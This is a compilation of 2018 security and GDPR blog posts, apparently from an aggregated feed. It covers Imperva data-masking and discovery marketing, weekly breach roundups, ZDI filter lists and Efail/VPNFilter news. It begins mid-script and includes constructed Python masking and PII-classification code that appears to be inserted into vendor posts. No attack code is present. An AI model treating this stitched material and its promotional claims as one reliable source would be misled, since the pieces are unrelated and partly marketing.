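                new_row[col] = transform(rng, new_row[col])
        masked.append(new_row)
    elapsed = time.perf_counter() - start
    return masked, (len(rows) / elapsed if elapsed > 0 else float("inf"))


# Constructed sample data standing in for a production copy (no real customers).
FAKE_NAMES = ["Alex Rivera", "Sam Okafor", "Jordan Lee", "Taylor Brandt", "Morgan Duval"]
CUSTOMERS: List[Row] = [
    {"id": "1", "name": "Jane Doe", "card": "4111 1111 1111 1111", "phone": "+1 555-010-0001", "tier": "gold"},
    {"id": "2", "name": "John Roe", "card": "5500 0000 0000 0004", "phone": "+1 555-010-0002", "tier": "basic"},
    {"id": "3", "name": "Jane Doe", "card": "3400 0000 0000 009", "phone": "+1 555-010-0003", "tier": "gold"},
]
MASKING_KEY = b"example-masking-key"  # constructed; a real deployment keeps this secret

CONFIG: Dict[str, Transformer] = {
    "name": make_loader(FAKE_NAMES, MASKING_KEY),
    "card": generate_card,
    "phone": generate_phone,
}


def mask_customers() -> List[Row]:
    masked, rate = mask_table(CUSTOMERS, CONFIG)
    print(f"masked {len(masked)} rows at {rate:,.0f} rows/second")
    return masked


if __name__ == "__main__":
    for row in mask_customers():
        print(row)
```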

For each of these key variables, it’s important to assess the business requirements and then balance appropriately with regards to the complexity of the underlying data model, the staging server horsepower, and the methods applied for the masking process. Imperva’s depth of experience in this regard provides additional value to customers when they are looking to understand the best implementation approach to meet both data security and end-user requirements. It’s a critical piece of the puzzle.

We know what impacts performance and what to consider beforehand. Now, how do we make it even better?

While we’ve focused on the more tool-agnostic variables that impact masking performance, there are also considerations within the tool itself that can help fine-tune the end result. For Imperva’s solution, there are a variety of levers that can be used to customize and optimize high-volume/high-throughput masking. For example, performance settings within the solution can be adjusted at multiple levels of the application stack including (a) the database server, (b) the Imperva Camouflage application server, and (c) within the masking engine itself to maximize performance. Settings for parallelization of operations, flexible allocation of hardware resources (RAM) and the use of bulk-SQL commands during masking operations, are some of the ways in which the performance and scalability of the Imperva Camouflage solution can also be configured.

A number of approaches for maximum scalability and performance are also available within the Imperva Camouflage solution that can be considered depending on the environment and requirements, including:

  • Multi-Threading – parallelization is used throughout Imperva Camouflage to enable masking to scale to the largest of databases and masking targets. This includes the capability to process many database columns at the same time while accounting for dependencies within certain databases.
  • Optimized SQL – although invisible to the user, Imperva Camouflage refines the SQL used to affect the masking depending on the database type as well as the particular masking operation being performed. No configuration changes are necessary to take advantage of bulk-SQL and other commands that minimize database logging overhead.
  • Execution on the Database Tier – many operations are performed directly on the database server(s) which has the effect of minimizing data movement over the network thereby maximizing performance. It also leverages the hardware resources that are typically dedicated to database servers.
  • Parallelization on the Database Tier – wherever possible, operations are performed in parallel using multiple instances on the database tier as well. For some environments, this is a combination of database engine settings as well as Imperva Camouflage configuration. By scaling up or down, the masking process can be made to conform to the needs/constraints of the given masking operation. This is one area where Imperva typically spends time with its customers and masking end users to ensure they are maximizing the tool’s performance.

It’s also important to reinforce that regardless of the solution, the storage architecture and configuration have a significant impact on performance. Faster storage with reads/writes spread across multiple disks will result in better performance overall. In many cases, database and storage tiers are configured for transactional workloads which are different from the bulk/batch workload that masking represents. Better performance will be found with faster storage that is in the same data center as the database server being masked, period!

Slow down to Speed up!

So, there are clearly a variety of factors that impact the run-rate of data masking, and yet there are a variety of levers (once understood) that can be pulled to optimize performance and meet end-user expectations. Additionally, leveraging industry-recognized, purpose-built solutions and best-practice implementation expertise offers a much more efficient and effective way to optimize data masking run-rates, and offers a more scalable and sustainable process over the long-term.

The key is to slow down during the implementation phase. Understand your requirements. Understand your data model. Understand what resources you need to apply to your staging server and your masking processes, and you’re well on your way to optimizing the resulting output. At the end of the day, Imperva can in most cases reverse engineer a customer’s desired performance requirements and configure the solution, processes, and recommended hosting architecture to achieve the desired result.

Imperva offers a variety of data security solutions to support organizational data security efforts, with Imperva Camouflage offering industry-leading support for masking (and/or pseudonymizing) data to help achieve privacy compliance requirements (e.g., GDPR) and mitigate the risk of a costly data breach within the various DevOps environments.

Get in touch to learn more about Imperva Camouflage and Imperva’s broader portfolio of data security solutions. Also, feel free to test-drive SCUBA, our free database vulnerability scanner tool, and/or CLASSIFIER, our free data classification tool.

This Week in Security News: Bloomingdale’s and Claudette

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, Timehop, Macy’s, Bloomingdale’s, and Domain Factory announce a system-wide breach. Also, a new AI tool, Claudette, is holding tech companies accountable for GDPR compliance.

Read on to learn more. 

Zero Day Initiative: A 1H2018 Recap

Now in its thirteenth year, the ZDI manages the largest vendor-agnostic bug bounty program in the world with over 3,500 external researchers.


Timehop Breach: U.S. Company Navigates Europe’s New Data Privacy Rules

Timehop – one of the first U.S. companies to suffer a major breach under GDPR – rushed to issue a report within the 72-hour deadline but failed to report the full extent of the information that was compromised.

Building a Profitable Security Services Offering Part 2 IT Security Features and Benefits Overview

Trend Micro is excited to partner with SPC International in this 5-part Blog, Webinar and Online Training Series; focused on Building a Profitable Security Services Offering for MSP Partners.

Notorious ‘Hijack Factory’ Shunned from Web

Bitcanal, a Portuguese web-hosting firm accused of helping spammers hijack dormant internet address space over the years, was kicked off the internet after multiple bandwidth providers severed ties.

How the Industry 4.0 Era Will Change the Cybersecurity Landscape

While enterprises work to enhance their efficiency, customer experience, logistics, and supply chains through IoT, their malicious counterparts may be expending just as much to undermine their efforts.

$660,000 Data Privacy Fine Highlights Dangers for Businesses Dabbling in Politics

The U.K. Information Commissioner’s Office is criminally prosecuting companies that have shared data with political parties, as well as giving them a $660,000 fine.

Check Your Accounts: Timehop, Macy’s, Bloomingdale’s, Domain Factory Announce Breach

Smartphone app Timehop, retailers Macy’s and sister company Bloomingdale’s, and Germany-based hosting provider Domain Factory announced that their systems were breached.

Macy’s Customer Credit Data Hacked In Breach

Data intruders accessed the names and passwords of some Macy’s customers and may have gained access to their credit card numbers and expiration dates, though not their four-digit security codes.

Keeping the Lights On: A Look at the EU’s Network and Information Security (NIS) Directive

The NIS is an EU-wide cybersecurity legislation that is meant to improve the cybersecurity of the critical utility and digital services industries, minimizing risk to essential processes and operations.

ZDI Reports Rise in Security Vulnerability Disclosures

Through the first six months of the year, ZDI has already published 600 security advisories, which is 33 percent more advisories than in the first half of 2017. 

A New AI Evaluates the GDPR Compliance of Top Tech Companies

The cutting-edge AI tool is part of a research project hosted at the Law Department of the European University Institute.

How Managed Detection and Response Provides Effective Threat Intelligence

Through managed detection and response, organizations can take advantage of the threat intelligence capabilities of security experts.

Did the results from Claudette’s scan surprise you? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Bloomingdale’s and Claudette appeared first on .

Want to avoid GDPR fines? Adjust your IT procurement methods

Gartner said many organizations are still not compliant with GDPR legislation even though it has been in force since May 2018. This is because they have not properly audited data handling within their supplier relationships. Sourcing and vendor management (SVM) leaders should, therefore, review all IT contracts to minimise potential financial and reputation risks. “SVM leaders are the first line of defense for organizations whose partners and suppliers process the data of EU residents on …

The post Want to avoid GDPR fines? Adjust your IT procurement methods appeared first on Help Net Security.

Digital transformation – why your whole approach to security has to change

Darron Gibbard, Managing Director EMEA North of Qualys, explains to Information Age why organisations must overhaul their approach to security in order to achieve success in digital transformation. By making security

The post Digital transformation – why your whole approach to security has to change appeared first on The Cyber Security Place.

GDPR, two months later

May 25 was D day, the day that the countdown to GDPR, the new General Data Protection Regulation, came to an end, and the legislation became obligatory across the whole of the European Union. Although companies had two years in which to adapt, in the end, the majority of cases saw a last-minute scramble to implement the new regulation.

Many companies were noticeably nervous and apprehensive, something that is understandable if we consider that the consequences of breaching the GDPR are severe, with fines of 10 million Euros or 2% of annual turnover (Level 1), or 20 million Euros or 4% of annual turnover (Level 2).

But now that the dust has started to settle, what assessment can we make of the situation? Have companies adjusted to the new regulation? Have they solved their doubts? Has corporate cybersecurity been standardized in Europe? Have the privacy policy update emails stopped? Has this whole process finally ended? The fact is there are still things left to do, and, if we analyze the consequences of the GDPR, we can say, broadly speaking, that there have been three different situations.


A rise in complaints in several countries

In the weeks leading up to the deadline for the new data protection regulation, large and small companies turned to all kinds of experts in order to adapt to the legislation. Not all of them, however, have managed to properly adapt. Or that, at least, is what many consumers think.

According to The Guardian, data protection agencies in many countries have reported a sharp rise in the number of complaints for apparent breaches of the GDPR: the UK Information Commissioner’s Office and the French CNIL have both reported that the number of complaints of this type has increased considerably. France, for example, has seen a 50% increase in complaints.

Google and Facebook under scrutiny

Many of the companies that were most concerned about the arrival of the GDPR were small and medium businesses. Though these companies handle less data, they also have less flexibility in their budgets, meaning that they have fewer resources with which to adapt to the legislation. However, the reactions that we have seen in the two months since its application have gone in the opposite direction.

In fact, according to the non-profit organization NOYB (None of Your Business) most complaints have been against tech giants such as Google, Facebook, or Twitter. The reason? These large companies, rather than totally changing their data treatment policies and fully adapting them to European legislation, chose to launch a standard message, forcing users to accept their new privacy and cybersecurity policies; if users didn’t accept, their accounts would be blocked.

The other side: those who went too far the other way

Nevertheless, there was also a third case that got a lot of people talking: this is where we saw large companies that, despite the fact that they already complied with the new legislation, decided to send their users an email, asking their permission to receive notifications.

If a user chose not to accept these new policies, or simply didn’t click on the link in the email, the company that sent it would be forced to remove many users from their database – users whose permission, in fact, didn’t need to be asked.

This is what lawyer Samuel Parra believes: “There are companies that, after being incorrectly advised, sent this email asking their users for consent again, when in fact, these users’ data had been obtained legitimately, so new consent wasn’t needed.” Thus, “they now have a problem: they have found that 70 or 80% of users didn’t click on the link in the email, meaning that these companies have to delete their details from their database”, something that has meant that “several companies may have lost a large amount of future revenue, all because of some bad advice”.

Whatever the case, one thing that is true is that all companies that handle data belonging to users in the EU not only have to have their users’ permission, but they also have to establish certain corporate cybersecurity measures, such as protecting their communications (emails are the gateway for threats to your company), or implement an action and information protocol in case of possible cyberattacks.

If you’re worried about your company’s IT security, you’ll be interested to find out more about Panda Adaptive Defense, Panda’s advanced cybersecurity suite that not only acts automatically on the most frequent intrusions, but also has a human team of analysts who are able to prevent, detect and respond to cyberattacks. What’s more, we’ve incorporated the module Panda Data Control to simplify the task of complying with the GDPR, helping you to have greater visibility and control of all personal data, including unstructured data, and to strengthen your security.

The post GDPR, two months later appeared first on Panda Security Mediacenter.

Zero-Day Coverage Update – Week of July 2, 2018

The General Data Protection Regulation (GDPR) has been up and running for a couple of months now and your organization is compliant. It’s time to take a little break – well, not so fast! Late last week, the State of California passed a new data privacy law called the California Consumer Privacy Act of 2018. Set to go in effect on January 1, 2020, it is being regarded as the strongest digital privacy policy in the United States. While it’s not as comprehensive as GDPR, there is opportunity for additional revisions to the law since it was passed by the legislature just in time to withdraw the proposed law from the November ballot. Had the initiative ended up on the ballot, any amendments to the existing text would be next to impossible. There will be much more discussion on this as the deadline gets closer. In the meantime, you can check to see if your organization is GDPR compliant by visiting

Zero-Day Filters

There are 29 new zero-day filters covering eight vendors in this week’s Digital Vaccine (DV) package. A number of existing filters in this week’s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of published advisories and upcoming advisories on the Zero Day Initiative website. You can also follow the Zero Day Initiative on Twitter @thezdi and on their blog.

ABB (4)

  • 32331: ZDI-CAN-6144: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32332: ZDI-CAN-6143: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32334: ZDI-CAN-6142: Zero Day Initiative Vulnerability (ABB Panel Builder 800)
  • 32336: ZDI-CAN-6136: Zero Day Initiative Vulnerability (ABB Panel Builder 800)

Advantech (3)

  • 32353: ZDI-CAN-6300: Zero Day Initiative Vulnerability (Advantech WebAccess Node)
  • 32354: ZDI-CAN-6301: Zero Day Initiative Vulnerability (Advantech WebAccess Node)
  • 32356: ZDI-CAN-6302: Zero Day Initiative Vulnerability (Advantech WebAccess Node)

Delta (1)

  • 32348: ZDI-CAN-6322: Zero Day Initiative Vulnerability (Delta Industrial Automation PMSoft)

Foxit (4)

  • 32343: ZDI-CAN-6332: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32345: ZDI-CAN-6330: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32346: ZDI-CAN-6329: Zero Day Initiative Vulnerability (Foxit Reader)
  • 32347: ZDI-CAN-6326: Zero Day Initiative Vulnerability (Foxit Reader)

LAquis SCADA (1)

  • 32351: ZDI-CAN-6319: Zero Day Initiative Vulnerability (LAquis SCADA)

Microsoft (2)

  • 32350: ZDI-CAN-6080: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 32352: ZDI-CAN-6081: Zero Day Initiative Vulnerability (Microsoft Windows)

Quest (2)

  • 32342: ZDI-CAN-6075: Zero Day Initiative Vulnerability (Quest KACE Systems Management)
  • 32355: ZDI-CAN-6095: Zero Day Initiative Vulnerability (Quest KACE Systems Management)

WECON (12)

  • 32257: ZDI-CAN-5956: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32319: ZDI-CAN-5924: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32323: ZDI-CAN-5938: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32324: ZDI-CAN-5931: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32325: ZDI-CAN-5929,5930: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32326: ZDI-CAN-5928: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32328: ZDI-CAN-5925,5926: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32329: ZDI-CAN-5927: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32330: ZDI-CAN-6062: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32333: ZDI-CAN-6063,6065: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32335: ZDI-CAN-6064: Zero Day Initiative Vulnerability (WECON LeviStudioU)
  • 32339: ZDI-CAN-6067: Zero Day Initiative Vulnerability (WECON LeviStudioU)

Missed Last Week’s News?

Catch up on last week’s news in my weekly recap.

The post Zero-Day Coverage Update – Week of July 2, 2018 appeared first on .

Back to Basics: Let’s Forget About the GDPR… For A Moment

At this point it’s fairly safe to assume that most everyone in the business of “data” has heard of the European Union (EU)-wide General Data Protection Regulation (GDPR) that was signed into law in late April 2016, with the compliance deadline having come into effect on May 25, 2018. Clearly, this new regulation has significant implications for organizations across the globe as it relates to data capture, storage, transfer and use. In previous blogs, whitepapers, and webinars, we outlined various ways by which companies can either “get started” with their GDPR compliance efforts or “maintain” compliance over the long-term.

With all the focus on GDPR compliance, however, we may have glossed over the importance of executing some key data processes for purposes much broader than GDPR. So, let’s forget about GDPR – only for a moment – and level-set on a few critical steps organizations must take to protect their sensitive data, mitigate the risk of accidental or malicious exposures and the subsequent cost and reputational risk.

A major challenge, and one that goes well beyond privacy compliance

In the rush to meet industry expectations or compliance cut-off dates, organizations may skip some foundational steps critical to ensuring long-term data security and reducing organizational cost and administrative burden. Far too many organizations spend far too much money trying to prevent data breaches by simply throwing the full force of technology at their environments. And, just like the old saying “half the money I spend on advertising is wasted; the trouble is I don’t know which half,” half the money spent on data protection is likely also wasted.

To that end, you can’t protect what you don’t know about. Many organizations labor under a false sense of security with respect to knowing what data they have, and where, and that’s just their production data environments. In many cases, lower level non-production or DevOps environments are similar to “wild west” organizational data stores with multiple copies, users, and risk points, usually with fewer security controls in place. In fact, according to an IDC report titled “Copy Data Management”, 82% of organizations surveyed had more than 10 copies of each database, a number that’s no doubt growing as data capture, storage, and use continues to grow.

Furthermore, organizations can waste a lot of time and money on a multitude of unnecessary technologies and resources aimed at protecting complex yet unclassified data environments. Understanding where all your data is stored, classifying relevant sensitive data to align with security and privacy requirements, and assessing vulnerabilities all play a critical role in priming the organization for long-term data security success; and in supporting process and technology enhancements in a more strategic and cost-effective manner.

This leads me to offer what many believe to be the number one data security priority for any organization, regardless of industry compliance requirements: data discovery and classification.

Executing your number one data security priority could also save you millions.

By identifying all databases, including archived, forgotten or rogue databases (yes, these exist!), cataloguing and classifying sensitive data, and assessing databases for vulnerabilities and misconfigurations, your organization is in a much better position to make educated decisions on what investments need to be made, and where, in terms of data security. It also allows you to find weak points in the chain and make decisions on what data is being captured, why, and where opportunities exist to remove databases or sensitive data, ultimately limiting the risk footprint and overall data protection costs.

Too many high profile, high value organizations skip this critical step in the haste to tick the compliance checkbox and are therefore under the false assumption that they are protected against the cost of data breach because they have either (a) purchased and installed various security software and related applications, and/or (b) have grossly inflated their IT budgets with additional internal hires or an army of consultants. They don’t really know what they have, where it is, or why they are protecting it (and at what cost).

This is clearly a risky scenario from a variety of perspectives. So, where do you go from here? Some organizations attempt manual discovery efforts to achieve a greater understanding of their data environments, and while better than nothing, these manual processes are fraught with inefficiencies, risk, and opportunity costs when looking at the resources required.

Leveraging industry-recognized, purpose-built solutions and expertise offers a much more efficient and effective way to conduct data discovery and classification, and a more scalable and sustainable process over the long term. Imperva offers a variety of data security solutions and managed services to support organizational data discovery and classification efforts, the two principal solutions being Imperva SecureSphere and Imperva Camouflage.

Mapping your data landscape with Imperva Data Security solutions

The Imperva SecureSphere solution offers Discovery and Assessment, which provides an automated and reliable way to locate ALL sensitive data. It easily identifies where databases are on the network, and across complex environments. It also surfaces rogue databases and finds sensitive data pertinent to all major privacy and compliance regulations. In addition, SecureSphere streamlines vulnerability assessment at the data level, providing a comprehensive list of over 1500 tests and assessment policies for scanning platform, software, and configuration vulnerabilities.

To make life even easier, SecureSphere produces automated and detailed reports that help provide an understanding of an organization’s overall security posture and risk footprint. In addition to graphical dashboards, it includes pre-defined assessment test reports as well as the ability to create custom reports. Assessment test reports also provide concrete recommendations to mitigate identified vulnerabilities and strengthen the security posture of a data repository. Imperva Camouflage also offers discovery and classification capabilities, embedded within a purpose-built data masking solution, and many organizations avail of them when choosing to de-identify or mask sensitive data for use in DevOps or test and development environments.

Regardless of the solution, it’s clear that using a purpose-built tool, with years of expertise built right in, can provide significant value to an organization when compared to native or manual efforts, and helps ensure a long-term sustainable model for data security.
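The discovery-and-classification process described above (enumerate every database, catalogue its columns, flag the ones holding sensitive data), shown as an added example rather than any vendor's product code: it scans a constructed in-memory SQLite database, and the PII patterns, match threshold and sample rows are this example's own assumptions.

```python
"""Sensitive-data discovery and classification over a SQL database.

Constructed example: enumerates every table and column from the schema
catalogue, samples values, and labels columns whose values match PII
patterns. Card numbers must also pass a Luhn check so that arbitrary
16-digit reference numbers are not flagged. Patterns, threshold and data
are assumptions of this example, not a vendor's rule set.
"""
import re
import sqlite3
from collections import Counter

# Classification rules: label -> pattern the whole value must match.
PATTERNS = {
    "email": re.compile(r"^[^@\s]+@[^@\s]+\.[A-Za-z]{2,}$"),
    # 13-19 digits, optionally separated by spaces or dashes.
    "payment_card": re.compile(r"^(?:\d[ -]?){12,18}\d$"),
    # UK National Insurance number, format check only (e.g. AB123456C).
    "uk_nino": re.compile(r"^[A-Z]{2}\d{6}[A-D]$"),
}
# Share of sampled non-empty values that must match before a column is
# labelled; stops a free-text column with one stray email being flagged.
MATCH_THRESHOLD = 0.7
SAMPLE_ROWS = 100


def luhn_ok(digits: str) -> bool:
    """Return True if a digit string passes the Luhn checksum."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:            # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def classify_value(value: str):
    """Return the PII label for one value, or None."""
    for label, pattern in PATTERNS.items():
        if not pattern.match(value):
            continue
        if label == "payment_card" and not luhn_ok(re.sub(r"[ -]", "", value)):
            continue                # right shape, wrong checksum: not a PAN
        return label
    return None


def classify_column(values):
    """Label a column from its sampled values; None if below threshold."""
    non_empty = [str(v) for v in values if v not in (None, "")]
    if not non_empty:
        return None
    counts = Counter(classify_value(v) for v in non_empty)
    counts.pop(None, None)
    if not counts:
        return None
    label, hits = counts.most_common(1)[0]
    return label if hits / len(non_empty) >= MATCH_THRESHOLD else None


def discover(conn: sqlite3.Connection) -> dict:
    """Walk every table and column; return {(table, column): label}."""
    findings = {}
    cur = conn.cursor()
    tables = [r[0] for r in cur.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        # Identifiers come from the catalogue itself, so quoting them is safe.
        cols = [r[1] for r in cur.execute(f'PRAGMA table_info("{table}")')]
        for col in cols:
            rows = cur.execute(
                f'SELECT "{col}" FROM "{table}" LIMIT {SAMPLE_ROWS}').fetchall()
            label = classify_column(r[0] for r in rows)
            if label:
                findings[(table, col)] = label
    return findings


def build_sample_db() -> sqlite3.Connection:
    """Constructed data: a forgotten export table alongside production."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE customers(id INTEGER, contact TEXT, notes TEXT);
        CREATE TABLE legacy_export_2016(ref TEXT, pan TEXT, nino TEXT);
        INSERT INTO customers VALUES
          (1, 'ann@example.com', 'called about invoice'),
          (2, 'bob@example.org', 'prefers email, bob@example.org'),
          (3, 'cara@example.net', NULL);
        INSERT INTO legacy_export_2016 VALUES
          ('A1', '4111 1111 1111 1111', 'AB123456C'),
          ('A2', '5555-5555-5555-4444', 'CD987654D'),
          ('A3', '378282246310005', 'EF000000A'),
          ('A4', '1234567890123456', 'GH111111B');
    """)
    return conn


if __name__ == "__main__":
    for (table, col), label in sorted(discover(build_sample_db()).items()):
        print(f"{table}.{col}: {label}")
```

Against a real estate the same walk runs over each discovered instance's catalogue (information_schema on most engines), and the findings feed the vulnerability and misconfiguration assessment of the databases that actually hold regulated data.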

The ease with which you can achieve critical data security outcomes provides significant value to the organization and a compelling cost/benefit analysis for the ultimate decision makers. These outcomes include:

  • Uncovering new, forgotten or rogue databases
  • Discovering where sensitive data is stored across your database infrastructure
  • Detecting database vulnerabilities based on the latest research from the Imperva Defense Center
  • Automating database discovery, sensitive data classification, and database vulnerability assessment
  • Auditing database configurations and measuring compliance with industry standards
  • Streamlining regulatory compliance efforts

Armed with this information an organization can quickly identify the level of security required for each application/database and determine both the appropriate technologies as well as the priority of deployment and investment required.

Ultimately, the organization will be primed to reduce their risk of internal or external data breaches, while at the same time enabling secure data use and copy provisioning. Oh, and let’s not forget the value in supporting compliance with privacy regulations such as HIPAA, FERPA, and GDPR!

Contact us to learn more about Imperva’s data security solutions and managed discovery and classification services in detail. Also, feel free to test-drive SCUBA, our free database vulnerability scanner tool, and/or CLASSIFIER, our free data classification tool.

Security newsround: June 2018

We round up reporting and research from across the web about the latest security news and developments. This month: help at hand for GDPR laggards, try and efail, biometrics blues, and calls for a router reboot as VPNFilter strikes.

Good data protection resources (see what we did there?)

Despite a very well flagged two-year countdown towards GDPR, the eleventh-hour scramble suggests many organisations were still unprepared. And let’s not forget that May 25 wasn’t a deadline but the start of an ongoing compliance process. Fortunately, there are some excellent resources to help, and we’ve rounded them up here.

This blog from Ireland’s deputy data protection commissioner debunks the widely (and wrongly) held theory of a bedding-in period before enforcement. The post also clarifies how organisations can mitigate the potential consequences of non-compliance with GDPR. Meanwhile the Irish Data Protection Bill passed a vote in the Dáil in time for the regulation. You can read the bill in full, if that’s your thing, by clicking here.

In the UK, the Information Commissioner’s Office has produced in-depth guidance on consent for processing information. Specifically, when to apply consent and when to look for alternatives. (Plug: our COO Valerie Lyons wrote a fine blog on the very same subject here.) Together with the National Cyber Security Centre, the ICO also developed guidance to describe a set of technical security outcomes that are considered to represent appropriate measures under the GDPR.

The European Data Protection Board (EDPB), formerly known as the Article 29 Working Party, was quickly into action after 25 May. It published guidelines (PDF) on certification mechanisms under the regulation. This establishes the rules by which certification can take place, as proof of compliance with GDPR.

Finally, for an interesting US perspective on the regulation, here’s AlienVault CISO John McLeod. “Every company should prepare for ‘Right to be Forgotten’ requests, which could present operational and compliance issues,” he said.

Do the hack-a

World Rugby suffered a data breach which saw attackers obtain personal details for thousands of subscribers. The data included the first name, email address and encrypted passwords of thousands of users, including players, coaches and parents worldwide. The Sunday Telegraph broke the story, with an interesting take on the news. The breach may have been a random incident but it’s also possible it was a targeted attack. Potential culprits might be one of the groups that previously leaked information from sporting bodies like WADA and the IAAF. Rugby’s governing body discovered the incident in early May, and took down the affected website to conduct more examinations. World Rugby is based in Dublin, and as a result it informed the Data Protection Commissioner about the breach. How would you handle a breach on that scale? Read our 10 steps to better post-breach incident response.

Efail: an email encryption problem or a vulnerability disclosure problem?

A group of researchers in Germany recently published details of critical flaws in PGP/GPG and S/MIME email encryption. They warned that the vulnerabilities could be used to decrypt previously encrypted emails, including sensitive messages sent in the past. Conforming to the security industry’s love of a catchy name (see also: Heartbleed, Shellshock), the researchers dubbed the flaw Efail.

It was the cue for urgent warnings from some quarters to stop using email encryption tools. As the researchers put it: “EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” The full technical research paper is here, while there’s a website with a Q&A here.

As the story moved on, it emerged that the problem lay more with how some email clients rendered messages. Motherboard’s snarky but well-informed take quoted Johns Hopkins University cryptography professor Matthew Green. He described the exploit as “an extremely cool attack and kind of a masterpiece in exploiting bad crypto, combined with a whole lot of sloppiness on the part of mail client developers.” ProtonMail, the world’s largest secure email service, was scathing about the news. After performing a deep analysis, it said its own client was not vulnerable, nor was the PGP protocol broken.

So what are the big lessons from this story? Distraction is a risk in security. Some security professionals may have rushed to react to Efail even if they didn’t need to. Curtis Franklin’s summary for Dark Reading observed that many enterprise IT teams have either moved away from PGP and S/MIME, or never used them. Noting the criticism of how the researchers published the vulnerabilities, Brian Honan wrote that ENISA, the European Union Agency for Network and Information Security, has published excellent good-practice guidance on vulnerability disclosure.

Biometrics blues as police recognition tech loses face

There was bad news for fans of dystopian sci-fi as police facial recognition systems for nabbing bad guys proved unreliable. Big Brother Watch claimed the Metropolitan Police’s automated facial recognition technology misidentified innocent people as wanted criminals more than nine times out of 10. The civil liberties group presented a report to the UK parliament about the technology’s shortcomings, among its findings the high false positive rate. Police forces have supported facial biometrics as a tool to help them combat crime. Privacy advocates described the technology’s use as “dangerously authoritarian”. As noted on our blog, this isn’t the first time a UK organisation has tried to introduce biometrics.

Router reboot alert

Malware called VPNFilter has infected 500,000 routers worldwide, and the net seems to be widening. Cisco Talos Intelligence researchers first revealed the malware, which hijacked devices in more than 54 countries but primarily in Ukraine. “The VPNFilter malware is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations,” the researchers said. VPNFilter can snoop on traffic, steal website credentials, monitor Modbus SCADA protocols, and has the capacity to damage or brick infected devices.

Sophos has a useful plain English summary of VPNFilter and what it can do. The malware affected products from a wide range of manufacturers, including Linksys, Netgear, Mikrotik, Q-Nap and TP-Link. In a later update, Talos said some products from Asus, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE were also at risk. As the malware’s payload became apparent, the FBI advised router owners to reboot their devices. This story shows that it’s always worth checking your organisation’s current risk with a security assessment.


The post Security newsround: June 2018 appeared first on BH Consulting.

Reaching GDPR: A Partner Approach

As Raj Samani, Chief Scientist and Fellow at McAfee says, “It’s critical that businesses do everything they can to protect one of the world’s most valuable assets: data.” Whether your organization achieved compliance with General Data Protection Regulation (GDPR) by the enforcement date on May 25, or still has a way to go, data will continue to play a large and evolving role in every sector and at every company. Samani explains, “The good news is that businesses are finding that stricter data protection regulations benefit both consumers and their bottom line. However, many have short-term barriers to overcome to become compliant, for example, to reduce the time it takes to report a breach.”

With the high cost of achieving compliance and even steeper fines if the rules are not met, complying with GDPR can seem daunting. If your organization is still working on meeting the baseline requirements of the regulation, McAfee and our partners have a wide range of materials to assist, including the National Institute of Standards and Technology (NIST) Cybersecurity Framework and a site with all you need to prepare for GDPR requirements. Additionally, McAfee Skyhigh has a detailed action guide to help organizations interpret the legislation and provide guidance on actions that need to be taken regarding data in the cloud.

McAfee doesn’t work alone in our commitment to GDPR and data security. Thanks to McAfee’s Security Innovation Alliance (SIA), we can quickly and effectively help more customers protect their data. These 125+ SIA vendors are committed to working together with our integrated ecosystem to help businesses reach and maintain GDPR standards.

While reaching compliance is the important first step, going beyond the data security fundamentals will quickly become critical to every organization, from commercial to healthcare. It is important to keep in mind that complying with GDPR does not mean you will not be breached. A genuine culture of privacy needs to be created as a core value within each organization. Consumers are increasingly aware of how companies are keeping their data secure, and businesses cannot afford to lose customer confidence in relation to data security. Securing consumers’ personal data in a transparent manner can serve as a differentiating factor for any company.

As cybersecurity professionals, it is up to us at McAfee and our Partners to provide the most pertinent GDPR information to each of our customers and help instill the culture of data privacy. The advent of GDPR is the best opportunity in a generation to bring data security up to every customer’s C-Suite and introduce meaningful and lasting change in data security. Together, we can support our customers to achieve GDPR compliance and beyond!

The post Reaching GDPR: A Partner Approach appeared first on McAfee Blogs.

Cyber Security Roundup for May 2018

I'm sure the GDPR coming into force on 25th May hasn't escaped anyone's attention. After years of warnings about the EU parliament's intended tough stance on enforcing the human right to privacy in the digital realm, a real 'game changer' of a global privacy regulation has finally landed, which impacts any organisation that touches EU citizens' personal data.

The GDPR's potentially hefty financial penalties for breaching its requirements are firmly on the radar of directors at large enterprises and small businesses alike, hence the massive barrage of emails we have all received in recent weeks on changes to company privacy statements and requesting consent, many of which I noted were not GDPR compliant in how they obtained "explicit consent" from the data subject. So, based on what I've seen so far in my mailbox, there is a long way to go for many organisations before they reach a truly GDPR compliant state.

Cybercriminals have been quick to take advantage of the deluge of GDPR privacy emails, using the subject matter in their phishing attacks to trick victims into giving up access to their accounts.

On a positive GDPR note, also on 25th May, IBM developerWorks released a three-part guidance series written by myself, aimed at helping application developers to develop GDPR compliant applications.

Developing GDPR Compliant Applications Guidance

Overshadowed by the GDPR coming into force, the release of the new NHS Data Security and Protection Toolkit, aimed at the NHS and its service providers, and the European NIS Directive (for telecom providers) went under the radar, but they are significant to those working in those industries.

